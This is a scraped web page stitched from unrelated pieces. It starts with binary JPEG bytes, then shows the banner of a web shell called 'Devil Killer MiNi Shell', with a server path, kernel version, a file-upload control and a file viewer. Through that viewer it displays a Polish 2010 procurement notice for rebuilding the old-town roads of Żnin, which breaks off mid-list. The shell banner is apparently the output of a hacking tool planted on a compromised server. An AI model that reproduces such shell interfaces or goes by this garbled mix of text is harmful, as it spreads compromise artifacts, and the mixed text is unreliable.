JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100224/38873-N-2010.html

<p class="kh_header"><b>Żnin: Rewitalizacja obszaru miejskiego Żnina - przebudowa dróg w obszarze starówki miasta Żnina</b><br>
<b>Numer ogłoszenia: 38873 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Żninie , ul. 700-lecia 39, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031301, faks 052 3031103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja obszaru miejskiego Żnina - przebudowa dróg w obszarze starówki miasta Żnina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rewitalizacja obszaru miejskiego Żnina - przebudowa dróg w obszarze starówki miasta Żnina - ulice: Plac Wolności, Sądowa, Wodna, Przesmyk, Śniadeckich, Średnia, Poprzeczna i 700 - lecia - deptak.
Przedmiot zamówienia obejmuje:
1. Branża drogowa.
Przedmiotem branży drogowej jest przebudowa ulic w obszarze starówki miasta Żnina w ramach rewitalizacji obszaru miejskiego w Żninie, polegającej na wykonaniu nawierzchni ulic, ciągów pieszych i wjazdów do posesji oraz miejsc postojowych. 
Ulica Wodna - (dł. 35,00 m oraz 63,65 m) na długości 98,65 m.
Ulica Wodna podzielona jest na dwa odcinki. Odcinek nr 1 - ciąg pieszy od ulicy Śniadeckich do ulicy Rychlewskiego - 35,00 m oraz odcinek nr 2 - ciąg jezdny z obustronnymi chodnikami - 63,65 m. Wyokrąglenie skrzyżowania z ulicą Lewandowskiego łukami R6,00 m i R5,00 m, z ulicą Śniadeckich R3,00 m. Trasę ulicy Wodnej zaprojektowano z zastosowaniem łuków poziomych (I etap).
Ulica Przesmyk - dł. 34,05 m.
Ulicę Przesmyk na odcinku 34,05 m wykonać jako ciąg pieszy. Wyokrąglenie skrzyżowania z ulicą Śniadeckich łukami R2,00 m. Trasę ulicy Przesmyk zaprojektowano bez załomów (I etap).
Plac Wolności - odcinek nr 2 (dł. 118,90 m) i ulica Śniadeckich (dł. 191,40 m). 
Dla Placu Wolności - odcinek nr 2 i ul. Śniadeckich przyjęto wspólny kilometraż. Na odcinku 310,30 m główny trakt pieszy o szerokości 6,00 m, który w ulicy Śniadeckich od skrzyżowania z ulicą Wodną poszerza się prawostronnie i tworzy plac przed kościołem. Po obu stronach wykonać chodnik (I etap - ulica Śniadeckich na dł. 191,40 m).
Ulica Kościuszki (dł. 46,80 m) - przedłużenie ulicy Śniadeckich.
W ulicy Kościuszki na odcinku 46,80m wykonać jezdnię jednokierunkową z miejscami postojowymi o szerokości 2,50 m i obustronnymi chodnikami. Trasę ulicy Kościuszki zaprojektowano z zastosowaniem łuków poziomych (I etap).
Plac Wolności - odcinek nr 1(dł. 43,70 m) i ulica 700 - lecia (dł. 92,75 m).
Dla Placu Wolności - odcinek nr 1 i ul 700 - lecia - deptak przyjęto wspólny kilometraż. Na odcinku 136,45 m wykonać główny trakt pieszy o szerokości 4,00m oraz chodnik po obu stronach. Skrzyżowania z ulicą Śniadeckich oraz ulicą Rychlewskiego wyokrąglono łukami R3,00m (I etap - ulica 700 - lecia na dł. 92,75 m).
Plac Wolności - odcinek nr 3 (dł. 97,10 m).
Na odcinku 97,10 m - główny trakt pieszy o szerokości 4,00m oraz po obu stronach chodniki. W zakresie - także przebudowa skrzyżowania z ulicą Rychlewskiego.
Plac Wolności.
Nawierzchnia Placu Wolności - płyty wokół Baszty, ograniczonej ulicami Sądową oraz Plac Wolności - odcinki nr 1, 2 i 3.
Ulica Poprzeczna (72,45 m).
W ulicy Poprzecznej na odcinku 29,30 m wykonać jezdnię z miejscami postojowymi o szerokości 5,00 m i obustronnymi chodnikami, a na pozostałym odcinku wykonać ciąg
pieszy w kierunku Placu Wolności. Łączna długość ulicy Poprzecznej wynosi 72,45 m. Wyokrąglenie skrzyżowania z ulicą Pocztową łukami R8,00 m i R6,00 m, a z Placem Wolności R3,00.
Ulica Średnia (dł. 117,90 m).
W ulicy Średniej - na odcinku 60,00 m wykonać jezdnię z obustronnymi chodnikami, a na pozostałym odcinku wykonać ciąg pieszy w kierunku ulicy Śniadeckich. Łączna długość ulicy Średniej wynosi 117,90 m. Wyokrąglenie skrzyżowania z ulicą Pocztową łukami R8,00 m i R5,00 m, z ulicą Śniadeckich R6,00 m, a zjazdy łukami R3,00 m. Trasę ulicy Średniej zaprojektowano z zastosowaniem łuków poziomych. 
Część ulicy Lewandowskiego i część ulicy Parkowej (dł. 61,05 m).
W części ulicy Lewandowskiego i części ulicy Parkowej na odcinku 61,05 m wykonać jezdnię z miejscami postojowymi o szerokości 2,50 m i obustronnymi chodnikami. Projektuje się także przebudowę - uzupełnienie i regulacje wysokościową istniejących chodników po stronie wschodniej ulicy oraz wykonanie trawników. Wyokrąglenie skrzyżowania z ulicą 700 -lecia łukami R8,00 m. Trasę części ulicy Lewandowskiego oraz część ulicy Parkowej wykonać z zastosowaniem łuków poziomych.
Konstrukcja nawierzchni jezdni ulic - trakty jezdne:
kostka kamienna surowo łupana 8/11 (kostka granitowa antracyt, czarna)   -  grub.10 cm,
podsypka cementowo - piaskowa  -  grub. 5 cm,
podbudowa zasadnicza z betonu C8/10  grub. 20 cm,
wzmocnienie gruntu - grunt stabilizowany cementem o Rm = 2,5 MPa - grub. 15 cm,
warstwa odsączająca - pospółka 0/31,5 mm  - grub. 15 cm,
geosiatka o sztywnych węzłach,
geotkanina separacyjno - filtracyjna.
RAZEM grub.  65 cm.
Konstrukcja nawierzchni parkingów:
kostka kamienna surowo łupana 8/11 (kostka granitowa czerwona) - grub. 8 cm,
podsypka cementowo - piaskowa  - grub. 5 cm,
podbudowa zasadnicza z betonu C8/10  - grub. 15 cm,
wzmocnienie gruntu - grunt stabilizowany cementem o Rm = 2,5 MPa - grub. 15 cm,
warstwa odsączająca - pospółka 0/31,5 mm  - grub. 15 cm,
geosiatka o sztywnych węzłach,
geotkanina separacyjno - filtracyjna.
RAZEM  grub. 58 cm.
Konstrukcja nawierzchni rynek - trakty jezdne:
kostka kamienna surowo łupana 8/11 (kostka granitowa szara) - grub. 8 cm,
podsypka cementowo - piaskowa  - grub. 5 cm,
podbudowa zasadnicza z betonu C8/10  - grub. 20 cm,
wzmocnienie gruntu - grunt stabilizowany cementem o Rm = 2,5 MPa - grub. 15 cm,
warstwa odsączająca - pospółka 0/31,5 mm  - grub. 15 cm,
geosiatka o sztywnych węzłach,
geotkanina separacyjno - filtracyjna.
RAZEM grub. 63 cm.
Konstrukcja nawierzchni rynek - trakty piesze (płyta główna):
płyty granitowe, płomieniowane polerowane (szare) - wymiary 100x50 cm i 50x50 cm - grub. 6 cm,
podsypka cementowo - piaskowa - grub. 5 cm,
wzmocnienie gruntu - grunt stabilizowany cementem o Rm = 2,5 MPa  - grub. 10 cm,
warstwa odsączająca - pospółka 0/31,5 mm  - grub. 15 cm,
geosiatka o sztywnych węzłach,
geotkanina separacyjno - filtracyjna.
RAZEM grub. 36 cm.
Chodniki.
kostka kamienna surowo łupana 4/6 (kostka granitowa szara) - grub. 6 cm,
podsypka cementowo - piaskowa - grub. 5 cm,
wzmocnienie gruntu - grunt stabilizowany cementem o Rm = 2,5 MPa  - grub. 10 cm,
warstwa odsączająca - pospółka 0/31,5 mm - grub. 15 cm,
geosiatka o sztywnych węzłach,
geotkanina separacyjno - filtracyjna.
RAZEM grub. 36 cm.
UWAGA !
krawężniki granitowe szlifowane,
spoinowanie nawierzchni z kostki granitowej przewidziano do wykonania zaprawą fugującą (mieszanka piasku kwarcowego z żywicą i utrwalaczem, zjazdy spoinować piaskiem kwarcowym) dla traktów jezdnych (jezdni) oraz zaprawą trasowo - cementową dla pozostałych nawierzchni.

Rozwiązanie wysokościowe.
Rozwiązanie wysokościowe zostało dostosowane do istniejącego poziomu ulic i ulic sąsiednich oraz możliwości usytuowania wpustów deszczowych. Projektuje się normatywne spadki podłużne. Wyniesienie krawężnika w typowym przekroju wynosi 12 cm, na wjazdach 4 cm, a na przejściach dla pieszych 2 cm. W przypadku ulic zamkniętych dla ruchu - ciągów pieszych - wyznacza się trakty główne, wyznaczone wystawioną kostką na 2 cm.

Przekroje poprzeczne.
Spadki poprzeczne projektuje się jako dwu i jednostronne o wartości 2 %. 

Odwodnienie.
Projektowane nawierzchnie ulic odwadnia się poprzez zaprojektowane spadki poprzeczne i podłużne do projektowanych wpustów ulicznych. Wpusty uliczne włączone będą do istniejących kanałów deszczowych. Projektuje się także wykonanie ścieków ulicznych o szerokości 0,20 m, poprzez obniżenie kostki na 2cm. 

2. Oświetlenie.
Słupy oświetleniowe należy zasilić proj. kablem YAKY4x35 mm2 + bednarka FeZn30x4 mm z proj. szafki oświetleniowej wg oddzielnego opracowania. Bednarkę układać w wykopie kablowym przed wykonaniem pierwszej podsypki oraz uziemić nią wszystkie proj. słupy oświetleniowe. Zasilanie opraw akcentowych wykonać kablem YKYżo3x4 mm2, z najbliższego słupa oświetleniowego, w którym należy zabudować zabezpieczenie nadprądowe.

3. Mała architektura i zieleń.
Elementy małej architektury.
Niniejsza branża obejmuje: montaż pompy wodnej, ławek, stojaków na rowery, kraty na świetlikach ulicznych oraz tablic informacyjnych. W ulicy 700 - lecia - Aleja Literatów - umieszczona będzie tablica granitowa. W ulicy Śniadeckich przed Kościołem wykonać ekspozycję wodociągu. Wykonać również (niewidzialny dom), scenę oraz zegar słoneczny na płycie Rynku. Pomnik Jędrzeja Śniadeckich znajdujący się na ulicy Sądowej przesunąć w kierunku wschodnim na koniec projektowanej alejki.
Zaprojektowano liczne nasadzenia drzew oraz likwidację istniejącej zieleni, tj. drzew, krzewów i żywopłotu.

4. Organizacja ruchu.
Demontaż istniejącego oznakowania i ustawienie nowych słupków z rur stalowych oraz montaż nowych tarcz znaków.

5. Media podziemne.
Zakres opracowania obejmuje:
budowę sieci wodociągowej o średnicy 110x10 mm PE o łącznej długości 608,5 m,
wymianę istniejących przyłączy wodociągowych na przyłącza z PE od projektowanej sieci wodociągowej 110x10 PE do pierwszego zaworu na zestawie wodomierzowym,
budowę przyłącza wodociągowego o średnicy 25x2,3 mm PE od istniejącej sieci wodociągowej w PE 110 do projektowanego zdroju ulicznego,
budowę przyłączy wodociągowych o średnicy 63x5,8 mm PE od projektowanej wg odrębnego opracowania sieci wodociągowej w PE110 do projektowanych fontann w przyszłości,
montaż zasuw wodociągowych kołnierzowych typu E wraz z skrzynkami ulicznymi oraz obudowami teleskopowymi,
wykonanie punktów węzłowych za pomocą kształtek żeliwnych sferoidalnych kołnierzowych,
wykonanie studni wodomierzowej z kręgów żelbetowych średnicy 1200 mm wraz z  zestawem wodomierzowym w postaci zaworów kulowych DN20, wodomierza skrzydełkowego JS 2.5 DN20 klasy C, filtru siatkowego DN20, zaworu zwrotnego antyskażeniowego typu BA DN20 oraz zaworu kulowego DN20 z kurkiem upustowym,
wykonanie studni wodomierzowych z kręgów żelbetowych średnicy 1500 mm wraz z zestawem wodomierzowym w postaci zaworów kulowych DN50, wodomierza skrzydełkowego JS 10 DN40 klasy C, filtru siatkowego DN50, zaworu zwrotnego antyskażeniowego typu BA DN50 oraz zaworu kulowego DN50 z kurkiem upustowym,
budowę sieci kanalizacji deszczowej o średnicy 500x14,6 mm PVC o łącznej długości 110,0 m,
budowę sieci kanalizacji deszczowej o średnicy 400x11,7 mm PVC o łącznej długości 616,5 m,
budowę sieci kanalizacji deszczowej o średnicy 315x9,2 mm PVC o łącznej długości 51,0 m,
budowę sieci kanalizacji deszczowej o średnicy 200x5,9 mm PVC o łącznej długości 33,5 m,
budowę osadnika zawiesiny mineralnej z kręgów żelbetowych  średnicy 2500 mm o pojemności 7,5 m3,
budowę seperatora lamelowego z kręgów żelbetowych średnicy 2500 mm o przepustowości nominalnej 120/1200 dm3/s typu PSW 120/1200,
budowę przykanalików deszczowych o średnicy 200x5,9 mm PVC do projektowanych wpustów ulicznych klasy D400 z osadnikiem 500 mm,
budowę przykanalików deszczowych o średnicy 200x5,9 mm PVC do granicy działek, zaślepionych korkiem,
budowę przykanalików deszczowych o średnicy 160x4,7 mm PVC do istniejących rur spustowych,
budowę przykanalika deszczowego o średnicy 110x3,2 mm PVC od projektowanych w przyszłości fontann do projektowanej wg odrębnego opracowania kanalizacji deszczowej kd średnicy 400,
przebudowę i regulację istniejących studni kanalizacyjnych, skrzynek zaworów wodociągowych i hydrantów oraz armatury wodociągowej i gazowej, do nowej niwelety drogi,
budowę sieci kanalizacji sanitarnej o średnicy 200x5,9 mm PVC o łącznej długości 1050,5 m,
budowę przyłączy kanalizacji sanitarnej o średnicy 160x4,7 mm PCV do granicy działek, zaślepionych korkiem.
UWAGA!
Media typu: kanalizacja deszczowa, kanalizacja sanitarna oraz sieć wodociągowa zawarta w przedmiarze całego zadania inwestycyjnego dotyczy tylko ulicy Średniej i ulicy Poprzecznej.
6. Uwagi końcowe.
Ze względu na fakt występowania uzbrojenia podziemnego należy zachować ostrożność podczas prowadzenia wszelkich robót w jego pobliżu - roboty ziemne należy prowadzić sposobem ręcznym. Lokalizacja uzbrojenia jest pokazana na oryginalnych naniesieniach sieci i przewodów uzbrojenia terenu znajdujących się w egzemplarzu nr 1 dokumentacji projektowej. W przypadku wątpliwości, co do lokalizacji uzbrojenia podziemnego należy skorzystać z oryginalnych naniesień i wykonać przekopy kontrolne celem dokładnej lokalizacji urządzeń podziemnych w obecności gestora sieci. 

a) Należy bezwzględnie przestrzegać ustaleń zawartych w uzgodnieniach.

b) Wykonawca zobowiązany jest powiadomić mieszkańców, przede wszystkim tych, których posesje sąsiadują z projektowanymi robotami, o terminie rozpoczęcia i zakończenia robót.

c) W zakresie Wykonawcy będzie pełna obsługa geodezyjna z inwentaryzacją powykonawczą.

d) Wywóz urobku z koryta drogi na odl. do 5 km. 

e) Wywóz materiałów z rozbiórki na odl. do 2 km.

Przed złożeniem oferty wskazana jest wizja lokalna terenu budowy.
Zamawiający zapewni nadzór inwestorski i archeologiczny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.10.00.00-8, 45.23.31.00-0, 45.23.00.00-8, 45.23.32.90-8, 45.23.14.00-9, 45.11.27.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 150.000,00 zł (słownie złotych: sto pięćdziesiąt tysięcy )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku  oceniane będzie na podstawie oświadczenia, o którym mowa w rozdziale XI pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie dokumentów i oświadczeń złożonych wraz z ofertą przez Wykonawcę, o których mowa w rozdziale XI pkt 5 SIWZ. Ze złożonych dokumentów i oświadczeń powinno wynikać, iż Wykonawca wykonał roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Warunek będzie spełniony w przypadku wykonania:
co najmniej jednego zadania polegającego na:
a) budowie lub przebudowie drogi, placu w strefie ochrony konserwatorskiej bądź  obiektach wpisanych do rejestru zabytków wraz z odwodnieniem, oświetleniem ulicznym oraz elementami architektury w ramach której została wykonana nawierzchnia z kamienia naturalnego o powierzchni co najmniej 12.000 m2,
oraz co najmniej dwóch zadań polegających na:
b)budowie lub przebudowie drogi, placu w strefie ochrony konserwatorskiej bądź  obiektu wpisanego do rejestru zabytków wraz z odwodnieniem w ramach której została wykonana nawierzchnia z kamienia naturalnego o powierzchni co najmniej 6.000 m2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku  oceniane będzie na podstawie dokumentów i oświadczeń, o których mowa w rozdziale XI pkt 6 i 7SIWZ.
Ze złożonych dokumentów i oświadczeń powinno wynikać, że Wykonawca dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia, tj. kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej oraz po jednej osobie posiadającej uprawnienia w specjalności sieci instalacji sanitarnej, elektrycznej i budowlanej. Osoby te winny należeć do Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku, o którym mowa w rozdziale X pkt 4 SIWZ  oceniane będzie na podstawie dokumentów, o których mowa w rozdziale XI pkt 4 i pkt 5 SIWZ. Ze złożonych dokumentów powinno wynikać, że Wykonawca:
a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na sumę gwarancyjną w wysokości, co najmniej 4.000.000 zł,
b) posiada na realizację przedmiotowego zadania środki finansowe lub zdolność kredytową nie mniejszą niż 4.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

